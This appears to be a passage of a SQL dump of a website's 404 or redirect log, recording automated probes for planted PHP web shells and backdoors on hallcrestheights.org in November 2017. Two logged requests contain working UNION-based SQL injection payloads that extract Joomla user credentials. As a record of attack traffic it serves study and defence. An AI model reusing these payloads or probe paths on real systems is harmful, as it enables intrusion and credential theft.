00:00:00'),(12755,'http://hallcrestheights.org/thumb.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:14:39','0000-00-00 00:00:00'),(12756,'http://hallcrestheights.org/xmlrpc-activate.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 18:16:21','0000-00-00 00:00:00'),(12757,'http://hallcrestheights.org/al277.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:17:20','0000-00-00 00:00:00'),(12758,'http://hallcrestheights.org/images/al277.php?z3=bm9OSVhnLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:17:27','0000-00-00 00:00:00'),(12759,'http://hallcrestheights.org/wsdl.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:17:56','0000-00-00 00:00:00'),(12760,'http://hallcrestheights.org/wp-data.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:19:21','0000-00-00 00:00:00'),(12761,'http://hallcrestheights.org/media/1ndex.php?z3=bm9OSVhnLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:23:25','0000-00-00 00:00:00'),(12762,'http://hallcrestheights.org/media/tmp.php?z3=bm9OSVhnLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 18:24:49','0000-00-00 00:00:00'),(12763,'http://hallcrestheights.org/google-assist.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:25:48','0000-00-00 00:00:00'),(12764,'http://hallcrestheights.org/images/google-assist.php?z3=bm9OSVhnLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-10 18:25:55','0000-00-00 00:00:00'),(12765,'http://hallcrestheights.org/elements.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:25:43','0000-00-00 00:00:00'),(12766,'http://hallcrestheights.org/cache/defau1t.php?z3=bm9OSVhnLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:25:47','0000-00-00 00:00:00'),(12767,'http://hallcrestheights.org/roubt.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:27:12','0000-00-00 00:00:00'),(12768,'http://hallcrestheights.org/bookmark.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:27:34','0000-00-00 00:00:00'),(12769,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=bm9OSVhnLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:33:16','0000-00-00 00:00:00'),(12770,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=bm9OSVhnLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:36:30','0000-00-00 00:00:00'),(12771,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=bm9OSVhnLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:36:41','0000-00-00 00:00:00'),(12772,'http://hallcrestheights.org/modules/modules/modules.php?z3=bm9OSVhnLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:41:11','0000-00-00 00:00:00'),(12773,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=bm9OSVhnLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:41:50','0000-00-00 00:00:00'),(12774,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=bm9OSVhnLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:42:07','0000-00-00 00:00:00'),(12775,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=bm9OSVhnLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:42:52','0000-00-00 00:00:00'),(12776,'http://hallcrestheights.org/sqlbak.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 18:45:52','0000-00-00 00:00:00'),(12777,'http://hallcrestheights.org/email.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 18:46:48','0000-00-00 00:00:00'),(12778,'http://hallcrestheights.org/images/stories/0day.php?z3=bm9OSVhnLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:46:53','0000-00-00 00:00:00'),(12779,'http://hallcrestheights.org/install.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:46:57','0000-00-00 00:00:00'),(12780,'http://hallcrestheights.org/goog1es.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 18:49:53','0000-00-00 00:00:00'),(12781,'http://hallcrestheights.org/error-log.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 18:51:25','0000-00-00 00:00:00'),(12782,'http://hallcrestheights.org/xmlsrpc.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:51:28','0000-00-00 00:00:00'),(12783,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=bm9OSVhnLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:51:35','0000-00-00 00:00:00'),(12784,'http://hallcrestheights.org/shootmei.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:50:27','0000-00-00 00:00:00'),(12785,'http://hallcrestheights.org/infos.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 18:52:31','0000-00-00 00:00:00'),(12786,'http://hallcrestheights.org/Abbrevsprl.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:00:57','0000-00-00 00:00:00'),(12787,'http://hallcrestheights.org/RoseLeif.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 19:05:43','0000-00-00 00:00:00'),(12788,'http://hallcrestheights.org/shootme.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 19:08:09','0000-00-00 00:00:00'),(12789,'http://hallcrestheights.org/images/xxx.php?z3=bm9OSVhnLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-10 19:09:52','0000-00-00 00:00:00'),(12790,'http://hallcrestheights.org/cache/support.php?z3=bm9OSVhnLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 19:14:27','0000-00-00 00:00:00'),(12791,'http://hallcrestheights.org/media/404.php?z3=bm9OSVhnLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 19:14:53','0000-00-00 00:00:00'),(12792,'http://hallcrestheights.org/authenticating.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:16:20','0000-00-00 00:00:00'),(12793,'http://hallcrestheights.org/show.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:16:23','0000-00-00 00:00:00'),(12794,'http://hallcrestheights.org/cache/news.php?z3=bm9OSVhnLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:16:26','0000-00-00 00:00:00'),(12795,'http://hallcrestheights.org/images/head.php?z3=bm9OSVhnLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:16:31','0000-00-00 00:00:00'),(12796,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=bm9OSVhnLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:16:36','0000-00-00 00:00:00'),(12797,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=bm9OSVhnLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:15:18','0000-00-00 00:00:00'),(12798,'http://hallcrestheights.org/files/files.php?z3=bm9OSVhnLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:18:58','0000-00-00 00:00:00'),(12799,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=bm9OSVhnLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:19:02','0000-00-00 00:00:00'),(12800,'http://hallcrestheights.org/files/conn.php?z3=bm9OSVhnLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 19:21:15','0000-00-00 00:00:00'),(12801,'http://hallcrestheights.org/cache/list.php?z3=bm9OSVhnLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:19:56','0000-00-00 00:00:00'),(12802,'http://hallcrestheights.org/images/laj.php?z3=bm9OSVhnLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-10 19:25:26','0000-00-00 00:00:00'),(12803,'http://hallcrestheights.org/log.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:26:53','0000-00-00 00:00:00'),(12804,'http://hallcrestheights.org/includes/u2p.php?z3=bm9OSVhnLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:26:56','0000-00-00 00:00:00'),(12805,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=bm9OSVhnLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:25:38','0000-00-00 00:00:00'),(12806,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=bm9OSVhnLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:27:03','0000-00-00 00:00:00'),(12807,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=bm9OSVhnLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 19:25:49','0000-00-00 00:00:00'),(12808,'http://hallcrestheights.org/wp-main.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:27:07','0000-00-00 00:00:00'),(12809,'http://hallcrestheights.org/images/robots.txt.php?z3=bm9OSVhnLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:28:34','0000-00-00 00:00:00'),(12810,'http://hallcrestheights.org/cli/40dd1d.php?z3=bm9OSVhnLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 19:28:43','0000-00-00 00:00:00'),(12811,'http://hallcrestheights.org/images/1ndex.php?z3=YnhyREZLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:26:57','0000-00-00 00:00:00'),(12812,'http://hallcrestheights.org/cache/cachee.php?z3=YnhyREZLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:29:40','0000-00-00 00:00:00'),(12813,'http://hallcrestheights.org/maill.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:32:32','0000-00-00 00:00:00'),(12814,'http://hallcrestheights.org/wp-cache.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:32:36','0000-00-00 00:00:00'),(12815,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=YnhyREZLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:34:14','0000-00-00 00:00:00'),(12816,'http://hallcrestheights.org/SessionController.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:34:19','0000-00-00 00:00:00'),(12817,'http://hallcrestheights.org/webconfig.txt.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:34:36','0000-00-00 00:00:00'),(12818,'http://hallcrestheights.org/robots.txt.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:38:21','0000-00-00 00:00:00'),(12819,'http://hallcrestheights.org/sql_dump.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:40:26','0000-00-00 00:00:00'),(12820,'http://hallcrestheights.org/jconfig.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:41:41','0000-00-00 00:00:00'),(12821,'http://hallcrestheights.org/thumb.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-12 21:41:48','0000-00-00 00:00:00'),(12822,'http://hallcrestheights.org/xmlrpc-activate.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-12 21:42:26','0000-00-00 00:00:00'),(12823,'http://hallcrestheights.org/al277.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:42:29','0000-00-00 00:00:00'),(12824,'http://hallcrestheights.org/images/al277.php?z3=YnhyREZLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:43:56','0000-00-00 00:00:00'),(12825,'http://hallcrestheights.org/wsdl.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:42:43','0000-00-00 00:00:00'),(12826,'http://hallcrestheights.org/wp-data.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:42:53','0000-00-00 00:00:00'),(12827,'http://hallcrestheights.org/media/1ndex.php?z3=YnhyREZLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:45:31','0000-00-00 00:00:00'),(12828,'http://hallcrestheights.org/media/tmp.php?z3=YnhyREZLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:44:17','0000-00-00 00:00:00'),(12829,'http://hallcrestheights.org/google-assist.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:47:06','0000-00-00 00:00:00'),(12830,'http://hallcrestheights.org/elements.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:50:02','0000-00-00 00:00:00'),(12831,'http://hallcrestheights.org/cache/defau1t.php?z3=YnhyREZLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:50:38','0000-00-00 00:00:00'),(12832,'http://hallcrestheights.org/roubt.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:51:13','0000-00-00 00:00:00'),(12833,'http://hallcrestheights.org/bookmark.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:51:23','0000-00-00 00:00:00'),(12834,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=YnhyREZLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-12 21:52:46','0000-00-00 00:00:00'),(12835,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=YnhyREZLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-12 21:53:46','0000-00-00 00:00:00'),(12836,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=YnhyREZLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:53:49','0000-00-00 00:00:00'),(12837,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=YnhyREZLLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:55:35','0000-00-00 00:00:00'),(12838,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=YnhyREZLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:57:07','0000-00-00 00:00:00'),(12839,'http://hallcrestheights.org/A.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-12 21:57:56','0000-00-00 00:00:00'),(12840,'http://hallcrestheights.org/modules/modules/modules.php?z3=YnhyREZLLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:57:58','0000-00-00 00:00:00'),(12841,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=YnhyREZLLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:58:01','0000-00-00 00:00:00'),(12842,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=YnhyREZLLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',1,0,'2017-11-12 21:58:08','0000-00-00 00:00:00'),(12843,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=YnhyREZLLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-11-12 21:58:57','0000-00-00 00:00:00'),(12844,'http://hallcrestheights.org/images/stories/0day.php?z3=YnhyREZLLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 22:01:26','0000-00-00 00:00:00'),(12845,'http://hallcrestheights.org/install.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 22:01:32','0000-00-00 00:00:00'),(12846,'http://hallcrestheights.org/xmlsrpc.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-12 22:07:54','0000-00-00 00:00:00'),(12847,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=YnhyREZLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-12 22:07:57','0000-00-00 00:00:00'),(12848,'http://hallcrestheights.org/shootmei.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 22:08:09','0000-00-00 00:00:00'),(12849,'http://hallcrestheights.org/infos.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-12 22:08:58','0000-00-00 00:00:00'),(12850,'http://hallcrestheights.org/Abbrevsprl.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-12 22:11:31','0000-00-00 00:00:00'),(12851,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=YnhyREZLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-12 22:10:59','0000-00-00 00:00:00'),(12852,'http://hallcrestheights.org/images/xxx.php?z3=YnhyREZLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-12 22:17:19','0000-00-00 00:00:00'),(12853,'http://hallcrestheights.org/modules/mod_fxprev/libraries/tmpl.php',NULL,'hallcrestheights.org','',1,0,'2017-11-13 07:30:42','0000-00-00 00:00:00'),(12854,'http://hallcrestheights.org/index.php?option=com_newssearch&type=list§ion=1&cid=%\' and 1=2) union select 1, concat(0x3a,username,0x3a,email,0x3a,0x3a,activation),concat(0x3a,username,0x3a,email,0x3a,password,0x3a,activation),\'Super Administrator\',\'ema',NULL,'','',1,0,'2017-11-14 02:45:36','0000-00-00 00:00:00'),(12855,'http://hallcrestheights.org/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null\'+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users-- -',NULL,'','',3,0,'2017-11-14 02:45:37','0000-00-00 00:00:00'),(12856,'http://hallcrestheights.org/modules/mod_articles_category/media-views-rtl.php',NULL,'http://site.ru','',1,0,'2017-11-14 16:35:53','0000-00-00 00:00:00'),(12857,'http://hallcrestheights.org/tmp/x.php',NULL,'http://site.ru','',2,0,'2017-11-14 18:51:53','0000-00-00 00:00:00'),(12858,'http://hallcrestheights.org/images/1ndex.php?z3=YXNZTEw4LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:29:30','0000-00-00 00:00:00'),(12859,'http://hallcrestheights.org/cache/cachee.php?z3=YXNZTEw4LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:30:02','0000-00-00 00:00:00'),(12860,'http://hallcrestheights.org/maill.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-14 21:31:24','0000-00-00 00:00:00'),(12861,'http://hallcrestheights.org/wp-cache.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:33:42','0000-00-00 00:00:00'),(12862,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=YXNZTEw4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:33:36','0000-00-00 00:00:00'),(12863,'http://hallcrestheights.org/SessionController.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:33:41','0000-00-00 00:00:00'),(12864,'http://hallcrestheights.org/webconfig.txt.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:35:15','0000-00-00 00:00:00'),(12865,'http://hallcrestheights.org/robots.txt.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:35:51','0000-00-00 00:00:00'),(12866,'http://hallcrestheights.org/sql_dump.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:37:50','0000-00-00 00:00:00'),(12867,'http://hallcrestheights.org/jconfig.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:37:56','0000-00-00 00:00:00'),(12868,'http://hallcrestheights.org/thumb.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-14 21:38:00','0000-00-00 00:00:00'),(12869,'http://hallcrestheights.org/xmlrpc-activate.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-14 21:39:59','0000-00-00 00:00:00'),(12870,'http://hallcrestheights.org/al277.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:40:02','0000-00-00 00:00:00'),(12871,'http://hallcrestheights.org/images/al277.php?z3=YXNZTEw4LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:38:45','0000-00-00 00:00:00'),(12872,'http://hallcrestheights.org/wsdl.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:40:11','0000-00-00 00:00:00'),(12873,'http://hallcrestheights.org/wp-data.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:38:56','0000-00-00 00:00:00'),(12874,'http://hallcrestheights.org/media/1ndex.php?z3=YXNZTEw4LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:40:34','0000-00-00 00:00:00'),(12875,'http://hallcrestheights.org/media/tmp.php?z3=YXNZTEw4LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:42:01','0000-00-00 00:00:00'),(12876,'http://hallcrestheights.org/google-assist.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:40:52','0000-00-00 00:00:00'),(12877,'http://hallcrestheights.org/elements.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:44:03','0000-00-00 00:00:00'),(12878,'http://hallcrestheights.org/cache/defau1t.php?z3=YXNZTEw4LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:42:48','0000-00-00 00:00:00'),(12879,'http://hallcrestheights.org/roubt.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:42:53','0000-00-00 00:00:00'),(12880,'http://hallcrestheights.org/bookmark.php?z3=YXNZTEw4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:44:20','0000-00-00 00:00:00'),(12881,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=YXNZTEw4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-14 21:43:31','0000-00-00 00:00:00'),(12882,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=YXNZTEw4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-14 21:46:01','0000-00-00 00:00:00'),(12883,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=YXNZTEw4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-14 21:46:03','0000-00-00 00:00:00'),(12884,'http://www.hallcrestheights.org/oiyizg-i20162633-k8289-olrcmwfb-snop-dgfnh-skrl-jrgfctf-zfiwxwm-akoay/',NULL,'','',1,0,'2017-11-15 15:09:03','0000-00-00 00:00:00'),(12885,'http://hallcrestheights.org/images/1ndex.php?z3=QUJDdWh4LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:37:28','0000-00-00 00:00:00'),(12886,'http://hallcrestheights.org/cache/cachee.php?z3=QUJDdWh4LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:37:46','0000-00-00 00:00:00'),(12887,'http://hallcrestheights.org/maill.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:39:38','0000-00-00 00:00:00'),(12888,'http://hallcrestheights.org/wp-cache.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:39:41','0000-00-00 00:00:00'),(12889,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=QUJDdWh4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:41:08','0000-00-00 00:00:00'),(12890,'http://hallcrestheights.org/SessionController.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:39:56','0000-00-00 00:00:00'),(12891,'http://hallcrestheights.org/webconfig.txt.php?z3=QUJDdWh4LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-16 22:40:14','0000-00-00 